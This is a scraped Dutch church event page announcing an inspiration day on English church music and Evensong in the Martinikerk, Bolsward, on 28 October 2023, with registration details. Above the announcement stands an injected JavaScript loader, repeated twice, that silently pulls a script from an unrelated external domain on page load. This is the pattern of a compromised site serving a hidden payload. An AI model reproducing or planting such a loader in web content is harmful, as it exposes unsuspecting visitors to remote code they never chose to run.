;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Inspiratiedag Engelse kerkmuziek & Evensong - PKN Damwâld
28 oktober 2023
10:00 t/m 17:00
Martinikerk Bolward
Inspiratiedag Engelse kerkmuziek & Evensong

Op zaterdag 28 oktober 2023 is er in de Martinikerk Bolsward van 10.00-17.00 uur een inspiratiedag Engelse kerkmuziek&Evensong bestemd voor alle geïnteresseerden, kerkmusici, voorgangers, koorzangers georganiseerd door de werkgroep Kerkmuziek. “Dirigent Geke Bruining en organist Mattijs de Vreugd nemen ons de hele dag al zingend mee in de chants, psalmen, hymns, anthems en cantica. De oorsprong van de Evensong ligt in de getijdengebeden van de christelijke kerk, met een zeer belangrijke plaats voor het biddend zingen van de Psalmen. In de 16e eeuw voegde de Anglicaanse aartsbisschop Thomas Cranmer de Vespers en Completen samen tot ’Evensong’ of ’Evening Prayer’. Op deze dag maken we ook de vertaalslag naar onze eigen liturgische praktijk.”
Deze dag brengt de nodige kosten met zich mee en een eigen bijdrage van de deelnemers wordt daarom zeer gewaardeerd. Om de dag goed te kunnen voorbereiden is het wenselijk dat u zich aanmeldt via dit emailadres: jf.rollema@gmail.com (t.a.v. Jelle Rollema, lid Werkgroep Kerkmuziek). Geef zo mogelijk door of u sopraan, alt, tenor of baspartij kunt zingen. Na aanmelding sturen we u alvast muziek en verdere informatie toe.

Locatie: Martinikerk BolwardGroot Kerkhof 26, 8701 HG Bolsward